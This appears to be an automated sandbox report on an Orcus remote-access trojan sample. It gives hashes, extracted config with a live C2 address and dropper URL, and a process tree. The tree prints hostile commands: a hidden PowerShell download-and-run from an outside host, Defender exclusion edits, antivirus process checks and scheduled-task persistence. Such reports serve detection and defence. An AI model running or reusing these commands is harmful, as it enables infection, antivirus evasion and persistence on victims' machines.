Analysis

  • max time kernel
    140s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-12-2024 16:34

General

  • Target

    6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3.exe

  • Size

    6.9MB

  • MD5

    5eecc13df41c8e6967f8a3ecb1d0cda9

  • SHA1

    8ac9ce30344f976a09da51da509dee5d2b0e8723

  • SHA256

    6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3

  • SHA512

    24c981ad16a5bc65738127dc27f2c804f4678671a8c13ff60ef2edcf795b8b6d505d121f407514dfbe7853b5d7577299ae30832319d21e83c5c18f5c638382d1

  • SSDEEP

    196608:2ALE6dWjWnulUCK9vDfaa1RkYP60bs25rXSNBl66Wncma:k6fuiPrfZ1RBP60bs25rXQ66WnG

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    exe.dropper: https://cdn-downloads-now.xyz/COMSurrogate.exe

Extracted

  • Family

    orcus

  • C2

    45.74.38.211:4782

  • Mutex

    7a9c0f279c464958aebbd585f20f1cf2

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • TA505

    Cybercrime group active since 2015, responsible for families like Dridex and Locky.

  • Ta505 family
  • Orcurs Rat Executable 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell with its display window hidden.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1144
      • C:\Users\Admin\AppData\Local\Temp\6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3.exe
        "C:\Users\Admin\AppData\Local\Temp\6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3.exe"
        2⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1232
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "wrsa opssvc"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1480
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2460
          • C:\Windows\SysWOW64\findstr.exe
            findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2348
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 491505
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2012
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2468
          • C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
            Dr.com B
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Deletes itself
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3000
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2984
            • C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
              C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1204
              • C:\Users\Admin\AppData\Local\Temp\COMSurrogate.exe
                "C:\Users\Admin\AppData\Local\Temp\COMSurrogate.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                PID:2948
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\ex.bat" "
                6⤵
                • System Location Discovery: System Language Discovery
                PID:316
                • C:\Windows\SysWOW64\net.exe
                  net session
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2564
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 session
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2476
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3052
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "
                6⤵
                • System Location Discovery: System Language Discovery
                PID:696
                • C:\Windows\SysWOW64\net.exe
                  net session
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1308
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 session
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1548
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /fi "imagename eq mi.exe"
                  7⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1836
                • C:\Windows\SysWOW64\find.exe
                  find /i "mi.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1952
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1368
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://cdn-downloads-now.xyz/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1480
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2560
          • C:\Windows\SysWOW64\choice.exe
            choice /d y /t 15
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2960
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2972
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {5544E435-7D82-4782-80DE-A0C617B5C534} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
      1⤵
        PID:1056
        • C:\Windows\system32\wscript.EXE
          C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js"
          2⤵
            PID:2960
            • C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.scr
              "C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\Admin\AppData\Local\CreativePixel Tech\E"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2760

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js

          Filesize

          174B

          MD5

          f4e7fb4a2cd7331909b6376b42e531ab

          SHA1

          1459ff7146bb25b5ffa3921ed13b2a60b5c09718

          SHA256

          62e85e74af89f12a35f62448a1585c68b7599306dada8ca9dddde6018d7b12b3

          SHA512

          4616a3a014f1b1217c5c694b4d6785abea360dad8c622e8180b6531d8796e602eda0a0cd922dfa45b277604440778b847d18afb8baff7818e8d6ff3fb4dc8a28

        • C:\Users\Admin\AppData\Local\CreativePixel Tech\E

          Filesize

          6.3MB

          MD5

          0a1e63fc10dd1dbb8b2db81e2388bf99

          SHA1

          67ad39aabbf4875bc1b165ccd5afc40194d1d3c8

          SHA256

          122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7

          SHA512

          94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

        • C:\Users\Admin\AppData\Local\Temp\Audit

          Filesize

          14KB

          MD5

          9da23439e34b0498b82ae193c5a8f3a8

          SHA1

          ae20bbe7fac03c94e42f4dd206d89003faae7899

          SHA256

          0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac

          SHA512

          cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

        • C:\Users\Admin\AppData\Local\Temp\COMSurrogate.exe

          Filesize

          164KB

          MD5

          77334f046a50530cdc6e585e59165264

          SHA1

          657a584eafe86df36e719526d445b570e135d217

          SHA256

          eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08

          SHA512

          97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

        • C:\Users\Admin\AppData\Local\Temp\Cab8B9F.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\Commissioner

          Filesize

          872KB

          MD5

          6ee7ddebff0a2b78c7ac30f6e00d1d11

          SHA1

          f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2

          SHA256

          865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4

          SHA512

          57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

        • C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

          Filesize

          1KB

          MD5

          b98885d703994cb43b4520881ea093e0

          SHA1

          920e5c84f92e75e981cd1c0274888f3856441cf8

          SHA256

          1ab0379eced5141d70a438ff2312488f28f2c6e72c3948bb6b2b575207aab445

          SHA512

          cffe79b0d48746124138b68c51a16ae73d6c70da6d8afc49e973648d76c0cfdaf57c42da8df33b8e7530c73d547178a571ced933517685c1cbe326ad11ce82af

        • C:\Users\Admin\AppData\Local\Temp\ex.bat

          Filesize

          401B

          MD5

          ce54310624724dc31ea4171ed501c1fa

          SHA1

          3c5b5c6d21eada75357a24699ba37703e6b2a3d0

          SHA256

          b955965b61fbec8f75499803f31ddce3228312df236d5e18c9b1b322dfc89f2e

          SHA512

          907ddf95e241da4104ab0e7535c74083f026b765d2e5717f817296828d652f2690215073b69552704b5ef6a075154b8f7f95384b8c3a79535b5109bdb3e2cf1c

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          e84a711ca2962f034dafcfc2b470a5ff

          SHA1

          353f2ee837ab6cf647fbad9b5692ed56c0e27eca

          SHA256

          f80c8f55178ea4f2ad907c287ca78efdadcae3fe7912861d2ce0df93931a247c

          SHA512

          8a09e4d22a129df377966c43f769b663ef955e0a59ec7809f6e5a1b598fb9566cde7f56ae043b538012a627978de8f68e2f520d01c6e2f78c14f55a81033fd85

        • \??\PIPE\srvsvc

          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

          Filesize

          63KB

          MD5

          b58b926c3574d28d5b7fdd2ca3ec30d5

          SHA1

          d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

          SHA256

          6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

          SHA512

          b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

        • memory/1204-367-0x0000000000390000-0x0000000000794000-memory.dmp

          Filesize

          4.0MB

        • memory/1204-376-0x0000000000C20000-0x0000000000C38000-memory.dmp

          Filesize

          96KB

        • memory/1204-377-0x0000000000CF0000-0x0000000000D00000-memory.dmp

          Filesize

          64KB

        • memory/1204-375-0x0000000000C10000-0x0000000000C18000-memory.dmp

          Filesize

          32KB

        • memory/1204-374-0x0000000000BC0000-0x0000000000BC8000-memory.dmp

          Filesize

          32KB

        • memory/1204-373-0x00000000008D0000-0x00000000008D8000-memory.dmp

          Filesize

          32KB

        • memory/1204-372-0x0000000000890000-0x00000000008A2000-memory.dmp

          Filesize

          72KB

        • memory/1204-371-0x0000000001190000-0x00000000011EC000-memory.dmp

          Filesize

          368KB

        • memory/1204-370-0x00000000007B0000-0x00000000007BE000-memory.dmp

          Filesize

          56KB

        • memory/1204-366-0x0000000000390000-0x0000000000794000-memory.dmp

          Filesize

          4.0MB

        • memory/1204-364-0x0000000000390000-0x0000000000794000-memory.dmp

          Filesize

          4.0MB

        • memory/2948-413-0x0000000000BD0000-0x0000000000BFE000-memory.dmp

          Filesize

          184KB